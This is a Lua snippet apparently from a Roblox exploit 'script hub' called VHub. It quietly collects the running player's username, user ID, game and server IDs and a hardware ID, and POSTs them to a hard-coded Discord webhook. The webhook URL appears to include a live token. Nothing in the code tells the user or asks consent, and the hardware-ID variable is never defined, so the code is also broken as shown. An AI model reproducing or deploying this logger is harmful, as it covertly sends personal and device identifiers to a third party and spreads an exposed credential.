local exploits = identifyexecutor()

local url =
   "https://discord.com/api/webhooks/953785291825614929/Vzlid18HyTbZfjolQCW0FXzpQxmspawT7lEOapvpd-LIIY2b19PZKlE5lkQD8t1lFHox"
local data = {
   ["content"] = "",
   ["embeds"] = {
       {
           ["title"] = "Player Info:", 
           ["description"] = "Username: " ..game.Players.LocalPlayer.Name.. "                                                                                                                                                     Player Profile: https://roblox.com/users/"..game.Players.LocalPlayer.UserId.."                                                                                                                                       Executed In: https://roblox.com/games/"..game.PlaceId.."                                                                                                                                ServerJob Id: " ..game.JobId.."                                                                                                                                Hardware ID: " ..HW.."",
           ["type"] = "rich",
           ["color"] = tonumber(0x332e2a),
           ["author"] = {
               ["name"] = "VHub have been excuted",
               ["icon_url"] = "https://d1fdloi71mui9q.cloudfront.net/jAtajPEeQYC3qUbhYN1g_i2GoG7s05luuh8za"
                   },
                   
                   ["thumbnail"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}


local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
